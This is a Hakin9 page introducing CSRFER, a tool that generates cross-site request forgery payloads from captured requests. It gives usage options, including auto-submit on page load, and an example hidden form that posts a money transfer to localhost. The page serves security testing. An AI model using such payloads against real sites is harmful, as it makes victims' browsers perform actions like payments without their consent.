CSRFER - Tool to generate csrf payloads based on vulnerable requests


CSRFER is a tool to generate csrf payloads, based on vulnerable requests.

It parses supplied requests to generate either a form or a fetch request. The payload can then be embedded in an HTML template.

More: https://github.com/luisfontes19/CSRFER


npm install -g csrfer


Usage: csrfer [options]

  --version              Show version number
  -r, --request          Path to the request file to be used
  -m, --mode             Mode to generate the code. Available options: form, fetch. (Default is form)
  -a, --autosubmit       Auto submit the request on page load
  -s, --show             Show the form inputs (only for form mode)
  -o, --output           Output the payload to the specified file instead of STDOUT
  -t, --template         Path to an html template page. Use the placeholder {{CONTENT}} to specify where to
                         inject the code (in html, not JS)
  -T, --defaulttemplate  Use this option if you want the code to be injected into a default html page.
  -h, --help             Show help

  csrfer -r req.txt -m form -a                    Automatically submit a form request
  csrfer -r req.txt -m form -s                    Generate and shows a form to be submitted manually
  csrfer -r req.txt -m fetch -t my_template.html  Generates a fetch request and uses the supplied template

Example output

<!DOCTYPE html>

  <title>This is Hello World page</title>

  <h1>Hello World</h1>

  <form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
    enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
      value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50&#x20AC;' /><br><input
      type='submit' value='submit'></form>



This project is MIT licensed

October 8, 2020


Hakin9 TEAM
Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023